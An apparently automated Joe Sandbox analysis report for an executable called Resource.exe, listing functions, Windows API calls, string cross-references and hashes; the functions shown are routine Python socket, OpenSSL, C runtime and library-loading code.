Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction ID: ab97227035c17614c76ebacd4e4e7ee6e92c931fa68778d22e46e7e6ca3f0a4f
Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction Fuzzy Hash: D741B233A28A9182EB208F65E5443A9A760FB98B94F504031EE4EC7798DF3ED441C755

Function 00007FF6E60BF918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6E60BF958
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6E60BF9AA

Strings

:, xrefs: 00007FF6E60BF96E

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
Instruction ID: 9779077099bc1c81c9a48a6173e7213cc3fde1fef54f3054ff395c134a33a55f
Opcode Fuzzy Hash: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
Instruction Fuzzy Hash: 8F21F033A282A182EB209F15D10436D73A1FB84B88F518036DA8DC7289DF7FE945C74A

Function 00007FF6E60A2C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

MessageBoxW.USER32 ref: 00007FF6E60A2D25
MessageBoxA.USER32 ref: 00007FF6E60A2D41

Strings

Error detected, xrefs: 00007FF6E60A2CFB, 00007FF6E60A2D33

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction ID: 3c7612168312b1675a74bfcd92f09ebfb07d43f7fb7f25979816c5f28e8ceaaf
Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction Fuzzy Hash: 1921A17363869691E720DB10F5907EA6364FF847C8F805135E68D87AA9DF3ED205CB09

Function 00007FF6E60A2B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

MessageBoxW.USER32 ref: 00007FF6E60A2C05
MessageBoxA.USER32 ref: 00007FF6E60A2C21

Strings

Fatal error detected, xrefs: 00007FF6E60A2BDB, 00007FF6E60A2C13

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction ID: 4a1fc1db99ae8f5b07350ad8bbbb5953359d746e0aea2d134d54379dc1e9ade8
Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction Fuzzy Hash: 5621A173638A9291E720DB10F5907EA6364FF847C4F805535E68D87AA9DF3ED205CB09

Function 00007FF6E60AFE80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6E60AFED0
RaiseException.KERNEL32 ref: 00007FF6E60AFF11

Strings

csm, xrefs: 00007FF6E60AFEFE

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction ID: 8b096633df1376e9c421017d51abba76ce05c766bc263b124d378e899360de77
Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction Fuzzy Hash: 79115B33628B5182EB60CB15F540369B7E5FB88B84F584234DE8D8B769EF3EC9518B04

Function 00007FF6E60C041C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C044C
GetDriveTypeW.KERNEL32 ref: 00007FF6E60C048C

Strings

:, xrefs: 00007FF6E60C0475

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction ID: f160c15780f50461a5f63c90a67caba337f823b03cf8e07b599d233bce92b7c1
Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction Fuzzy Hash: 9501F76393C22686FB20AF20952137F2390EF54744F404435D54ECA295DF3FE604CA2A

Analysis Process: Resource.exePID: 6048, Parent PID: 6632COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.8%
Total number of Nodes:	973
Total number of Limit Nodes:	161

Executed Functions

Function 00007FF8B7E51060 Relevance: 319.4, APIs: 10, Strings: 172, Instructions: 923
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00007FF8B7E510A2
00007FF8A8AE2E20.PYTHON311 ref: 00007FF8B7E510B7
VerSetConditionMask.NTDLL ref: 00007FF8B7E51102
VerSetConditionMask.NTDLL ref: 00007FF8B7E51111
VerSetConditionMask.NTDLL ref: 00007FF8B7E51121
VerifyVersionInfoW.KERNEL32 ref: 00007FF8B7E51145
VerSetConditionMask.NTDLL ref: 00007FF8B7E52117
VerSetConditionMask.NTDLL ref: 00007FF8B7E52126
VerSetConditionMask.NTDLL ref: 00007FF8B7E52137
VerifyVersionInfoA.KERNEL32 ref: 00007FF8B7E5215D

Strings

SO_ERROR, xrefs: 00007FF8B7E51610
IPV6_MULTICAST_LOOP, xrefs: 00007FF8B7E51C2E
IPPROTO_NONE, xrefs: 00007FF8B7E518F0
EAI_BADFLAGS, xrefs: 00007FF8B7E51DCA
IPPROTO_ICMPV6, xrefs: 00007FF8B7E518DA
MSG_ERRQUEUE, xrefs: 00007FF8B7E516D3
SO_EXCLUSIVEADDRUSE, xrefs: 00007FF8B7E514F2
EAI_SOCKTYPE, xrefs: 00007FF8B7E51E64
SOMAXCONN, xrefs: 00007FF8B7E5163C
SO_SNDTIMEO, xrefs: 00007FF8B7E515E4
SHUT_WR, xrefs: 00007FF8B7E51FB8
IPPROTO_ICMP, xrefs: 00007FF8B7E51790
SO_DEBUG, xrefs: 00007FF8B7E514B0
SOCK_STREAM, xrefs: 00007FF8B7E51445
BDADDR_ANY, xrefs: 00007FF8B7E5141E
AI_CANONNAME, xrefs: 00007FF8B7E51E8D
IPPROTO_ST, xrefs: 00007FF8B7E5198A
gaierror, xrefs: 00007FF8B7E51212
MSG_OOB, xrefs: 00007FF8B7E5164F
IPPROTO_IGP, xrefs: 00007FF8B7E519B6
EAI_MEMORY, xrefs: 00007FF8B7E51E0C
IPPROTO_ICLFXBM, xrefs: 00007FF8B7E51974
BTPROTO_RFCOMM, xrefs: 00007FF8B7E51404
SOL_SOCKET, xrefs: 00007FF8B7E51715
IP_MULTICAST_IF, xrefs: 00007FF8B7E51B68
IP_OPTIONS, xrefs: 00007FF8B7E51AE4
IPPROTO_PIM, xrefs: 00007FF8B7E5191C
00:00:00:FF:FF:FF, xrefs: 00007FF8B7E5142B
IP_RECVDSTADDR, xrefs: 00007FF8B7E51B52
SO_DONTROUTE, xrefs: 00007FF8B7E5151E
SO_RCVLOWAT, xrefs: 00007FF8B7E515CE
SIO_LOOPBACK_FAST_PATH, xrefs: 00007FF8B7E5201C
BDADDR_LOCAL, xrefs: 00007FF8B7E51435
SOCK_DGRAM, xrefs: 00007FF8B7E5145B
IP_MULTICAST_TTL, xrefs: 00007FF8B7E51B7E
IPPROTO_EGP, xrefs: 00007FF8B7E51814
IPPROTO_RAW, xrefs: 00007FF8B7E51948
AF_UNSPEC, xrefs: 00007FF8B7E51328
IPPROTO_HOPOPTS, xrefs: 00007FF8B7E5177D
TCP_FASTOPEN, xrefs: 00007FF8B7E51D9E
SOL_IP, xrefs: 00007FF8B7E5172B
IPPROTO_IP, xrefs: 00007FF8B7E5176A
SO_SNDBUF, xrefs: 00007FF8B7E5158C
SOCK_RDM, xrefs: 00007FF8B7E5149D
AI_PASSIVE, xrefs: 00007FF8B7E51E77
MSG_WAITALL, xrefs: 00007FF8B7E516BD
IPPROTO_RDP, xrefs: 00007FF8B7E519CC
AI_NUMERICHOST, xrefs: 00007FF8B7E51EA3
IPPROTO_IGMP, xrefs: 00007FF8B7E517A6
MSG_BCAST, xrefs: 00007FF8B7E516E9
SO_RCVBUF, xrefs: 00007FF8B7E515A2
IPPORT_RESERVED, xrefs: 00007FF8B7E51A24
AF_INET6, xrefs: 00007FF8B7E51380
AF_INET, xrefs: 00007FF8B7E5133E
IPPROTO_ROUTING, xrefs: 00007FF8B7E51882
INADDR_UNSPEC_GROUP, xrefs: 00007FF8B7E51A8F
NI_DGRAM, xrefs: 00007FF8B7E51F92
IPV6_MULTICAST_IF, xrefs: 00007FF8B7E51C18
MSG_TRUNC, xrefs: 00007FF8B7E51691
AI_ALL, xrefs: 00007FF8B7E51ECF
INADDR_ALLHOSTS_GROUP, xrefs: 00007FF8B7E51AA5
AF_IRDA, xrefs: 00007FF8B7E513D8
IPPROTO_SCTP, xrefs: 00007FF8B7E51932, 00007FF8B7E51A0E
SO_BROADCAST, xrefs: 00007FF8B7E51534
INADDR_BROADCAST, xrefs: 00007FF8B7E51A63
timeout, xrefs: 00007FF8B7E5122C
MSG_DONTROUTE, xrefs: 00007FF8B7E5167B
socket.gaierror, xrefs: 00007FF8B7E511EC
IPPROTO_CBT, xrefs: 00007FF8B7E519A0
INADDR_MAX_LOCAL_GROUP, xrefs: 00007FF8B7E51ABB
IPV6_JOIN_GROUP, xrefs: 00007FF8B7E51BD6
IP_RECVTOS, xrefs: 00007FF8B7E51B3C
AF_DECnet, xrefs: 00007FF8B7E51396
IPV6_LEAVE_GROUP, xrefs: 00007FF8B7E51BEC
IPV6_RECVTCLASS, xrefs: 00007FF8B7E51CF1
IPPROTO_AH, xrefs: 00007FF8B7E518C4
WSAStartup failed: network not ready, xrefs: 00007FF8B7E5313C
CAPI, xrefs: 00007FF8B7E5130D
AI_V4MAPPED, xrefs: 00007FF8B7E51EFB
IPPORT_USERRESERVED, xrefs: 00007FF8B7E51A3A
IPV6_UNICAST_HOPS, xrefs: 00007FF8B7E51C44
IPPROTO_PGM, xrefs: 00007FF8B7E519E2
SOL_TCP, xrefs: 00007FF8B7E51741
AF_IPX, xrefs: 00007FF8B7E51354
_socket.CAPI, xrefs: 00007FF8B7E512CC
IPPROTO_FRAGMENT, xrefs: 00007FF8B7E51898
IPV6_RECVRTHDR, xrefs: 00007FF8B7E51CDB
IPPROTO_GGP, xrefs: 00007FF8B7E517BC
IPV6_MULTICAST_HOPS, xrefs: 00007FF8B7E51C02
SO_SNDLOWAT, xrefs: 00007FF8B7E515B8
EAI_AGAIN, xrefs: 00007FF8B7E51DB4
MSG_PEEK, xrefs: 00007FF8B7E51665
TCP_NODELAY, xrefs: 00007FF8B7E51D30
IPV6_DONTFRAG, xrefs: 00007FF8B7E51C86
RCVALL_ON, xrefs: 00007FF8B7E5207C
AI_ADDRCONFIG, xrefs: 00007FF8B7E51EE5
INADDR_ANY, xrefs: 00007FF8B7E51A4D
AF_SNA, xrefs: 00007FF8B7E513C2
RCVALL_MAX, xrefs: 00007FF8B7E520A8
TCP_KEEPCNT, xrefs: 00007FF8B7E51D88
SO_TYPE, xrefs: 00007FF8B7E51626
SOL_UDP, xrefs: 00007FF8B7E51757
SOCK_SEQPACKET, xrefs: 00007FF8B7E51487
IPPROTO_UDP, xrefs: 00007FF8B7E51840
AI_NUMERICSERV, xrefs: 00007FF8B7E51EB9
EAI_FAMILY, xrefs: 00007FF8B7E51DF6
IPPROTO_PUP, xrefs: 00007FF8B7E5182A
IPPROTO_MAX, xrefs: 00007FF8B7E5195E
MSG_MCAST, xrefs: 00007FF8B7E516FF
AF_BLUETOOTH, xrefs: 00007FF8B7E513EE
IP_DROP_MEMBERSHIP, xrefs: 00007FF8B7E51BC0
has_ipv6, xrefs: 00007FF8B7E51291
IPV6_HOPOPTS, xrefs: 00007FF8B7E51CAF
IPPROTO_IPV4, xrefs: 00007FF8B7E517D2
SO_KEEPALIVE, xrefs: 00007FF8B7E51508
IPV6_TCLASS, xrefs: 00007FF8B7E51D1D
RCVALL_OFF, xrefs: 00007FF8B7E52069
WSAStartup failed: error code %d, xrefs: 00007FF8B7E53123
SO_ACCEPTCONN, xrefs: 00007FF8B7E514C6
SO_RCVTIMEO, xrefs: 00007FF8B7E515FA
NI_MAXSERV, xrefs: 00007FF8B7E51F27
IPV6_RTHDR, xrefs: 00007FF8B7E51D07
SHUT_RD, xrefs: 00007FF8B7E51FA5
IP_MULTICAST_LOOP, xrefs: 00007FF8B7E51B94
AF_APPLETALK, xrefs: 00007FF8B7E5136A
error, xrefs: 00007FF8B7E5118C
IPV6_HOPLIMIT, xrefs: 00007FF8B7E51C9C
MSG_CTRUNC, xrefs: 00007FF8B7E516A7
IP_TTL, xrefs: 00007FF8B7E51B26
TCP_KEEPIDLE, xrefs: 00007FF8B7E51D5C
SO_REUSEADDR, xrefs: 00007FF8B7E514DC
TCP_KEEPINTVL, xrefs: 00007FF8B7E51D72
IPPROTO_ESP, xrefs: 00007FF8B7E518AE
NI_NAMEREQD, xrefs: 00007FF8B7E51F66
IPPROTO_L2TP, xrefs: 00007FF8B7E519F8
00:00:00:00:00:00, xrefs: 00007FF8B7E51414
INADDR_LOOPBACK, xrefs: 00007FF8B7E51A79
IPPROTO_IDP, xrefs: 00007FF8B7E51856
INADDR_NONE, xrefs: 00007FF8B7E51AD1
IPV6_CHECKSUM, xrefs: 00007FF8B7E51C70
SO_USELOOPBACK, xrefs: 00007FF8B7E5154A
WSAStartup failed: requested version not supported, xrefs: 00007FF8B7E53145
IP_TOS, xrefs: 00007FF8B7E51B10
AF_LINK, xrefs: 00007FF8B7E513AC
EAI_SERVICE, xrefs: 00007FF8B7E51E4E
RCVALL_SOCKETLEVELONLY, xrefs: 00007FF8B7E52092
SocketType, xrefs: 00007FF8B7E51250
IPPROTO_TCP, xrefs: 00007FF8B7E517FE
SIO_RCVALL, xrefs: 00007FF8B7E51FDE
IPPROTO_IPV6, xrefs: 00007FF8B7E517E8
IP_ADD_MEMBERSHIP, xrefs: 00007FF8B7E51BAA
IPV6_PKTINFO, xrefs: 00007FF8B7E51CC5
NI_NOFQDN, xrefs: 00007FF8B7E51F3A
IPV6_V6ONLY, xrefs: 00007FF8B7E51C5A
TCP_MAXSEG, xrefs: 00007FF8B7E51D46
NI_MAXHOST, xrefs: 00007FF8B7E51F11
socket.herror, xrefs: 00007FF8B7E511AC
IP_HDRINCL, xrefs: 00007FF8B7E51AFA
EAI_NODATA, xrefs: 00007FF8B7E51E22
EAI_NONAME, xrefs: 00007FF8B7E51E38
socket, xrefs: 00007FF8B7E5126F
SO_LINGER, xrefs: 00007FF8B7E51560
SOCK_RAW, xrefs: 00007FF8B7E51471
SHUT_RDWR, xrefs: 00007FF8B7E51FCE
herror, xrefs: 00007FF8B7E511D2
NI_NUMERICHOST, xrefs: 00007FF8B7E51F50
SO_OOBINLINE, xrefs: 00007FF8B7E51576
IPPROTO_ND, xrefs: 00007FF8B7E5186C
EAI_FAIL, xrefs: 00007FF8B7E51DE0
SIO_KEEPALIVE_VALS, xrefs: 00007FF8B7E51FFD
NI_NUMERICSERV, xrefs: 00007FF8B7E51F7C
IPPROTO_DSTOPTS, xrefs: 00007FF8B7E51906

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion$00007Startup
String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
API String ID: 1562806975-1299366327
Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction ID: a2c1184c7ed5f0069f03642bba85f0eb37b3c30311ae824f10623665c02e0e31
Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction Fuzzy Hash: B9A2D2A8B18B8A95EB14DB1AEC5466C2721BF4AFD1F846035CE0E26774DE7DF249C700

Function 00007FF8A92D1A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 891COMMON

Download Yara Rule

Strings

HEAD , xrefs: 00007FF8A931B8EE
CONNE, xrefs: 00007FF8A931B91D
, xrefs: 00007FF8A931B08A
..\s\ssl\record\ssl3_record.c, xrefs: 00007FF8A931AC34, 00007FF8A931ADE1, 00007FF8A931AF20, 00007FF8A931AF6E, 00007FF8A931AF9E, 00007FF8A931AFCB, 00007FF8A931AFF8, 00007FF8A931B0A5, 00007FF8A931B0EE, 00007FF8A931B245, 00007FF8A931B26D, 00007FF8A931B2A4, 00007FF8A931B2D9, 00007FF8A931B363, 00007FF8A931B473, 00007FF8A931B641, 00007FF8A931B6D0, 00007FF8A931B6F2, 00007FF8A931B717, 00007FF8A931B74C, 00007FF8A931B781, 00007FF8A931B7B8, 00007FF8A931B7EF, 00007FF8A931B826, 00007FF8A931B85B, 00007FF8A931B942, 00007FF8A931B97C, 00007FF8A931B9EA, 00007FF8A931BA20
POST , xrefs: 00007FF8A931B8D0
PUT , xrefs: 00007FF8A931B909
ssl3_get_record, xrefs: 00007FF8A931AC2D, 00007FF8A931ADDA, 00007FF8A931AF19, 00007FF8A931AF67, 00007FF8A931AF97, 00007FF8A931AFBF, 00007FF8A931AFEC, 00007FF8A931B099, 00007FF8A931B0E2, 00007FF8A931B239, 00007FF8A931B261, 00007FF8A931B2CD, 00007FF8A931B357, 00007FF8A931B467, 00007FF8A931B635, 00007FF8A931B70B, 00007FF8A931B740, 00007FF8A931B775, 00007FF8A931B7AC, 00007FF8A931B7E3, 00007FF8A931B81A, 00007FF8A931B84F, 00007FF8A931B936, 00007FF8A931B970, 00007FF8A931B9E3, 00007FF8A931BA14
GET , xrefs: 00007FF8A931B8AD

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
Instruction ID: 2372bb6755848d43a13fe5aa2de846d273a179b1a52b5056316a6f0daf35ee50
Opcode Fuzzy Hash: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
Instruction Fuzzy Hash: CF927C31A0EEC2A2FB609F21D8447B967B1EF85BC4F646035DA4DC66A9EF3DE4418710

Function 00007FF8A8F29F90 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 893librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A8F2AAA5
GetProcAddress.KERNEL32 ref: 00007FF8A8F2AACF
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A8F2AB59
VirtualProtect.KERNEL32 ref: 00007FF8A8F2AB77

Strings

2v], xrefs: 00007FF8A8F29FBB

Memory Dump Source

Source File: 00000001.00000002.2484350469.00007FF8A8F29000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FF8A8950000, based on PE: true

Associated: 00000001.00000002.2483309052.00007FF8A8950000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8951000.00000040.00000001.01000000.00000004.sdmpDownload File
